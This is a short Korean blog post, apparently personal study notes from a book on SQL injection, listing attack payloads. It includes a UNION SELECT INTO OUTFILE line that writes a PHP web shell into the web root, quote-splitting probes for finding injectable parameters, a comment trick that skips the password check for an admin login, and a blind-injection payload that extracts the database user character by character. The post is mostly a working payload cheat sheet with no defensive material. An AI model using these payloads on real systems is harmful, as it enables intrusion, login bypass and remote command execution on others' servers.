2012.08.12 22:15

SQL injection 공격 과 방어의 원리 책들중...


UNION 구문과 INTO OUTFILE 을 이용하여 웹쉘 만들기


 1 UNION SELECT "<?system($_GET['cmd']);?>" INTO OUTFILE "/var/www/html/cmd.php" --



취약점 테스트로 좋은 구문


php?category=bikes
-> php?category=bi''kes

->php?category=bi'+'kes



패스워드 주석처리해 버리기(세미콜론이 먹힐때 )


select *from table where username='admin '/*'and passworkd='*/''; 



AND 나 OR 절 안쓰고 블라인드 하기 


where id =12/ (case+when+(ascii(substring(select+system_user),1,1))+>+64)+then+1+else+0+end)  //OK or error 


Posted by k1rha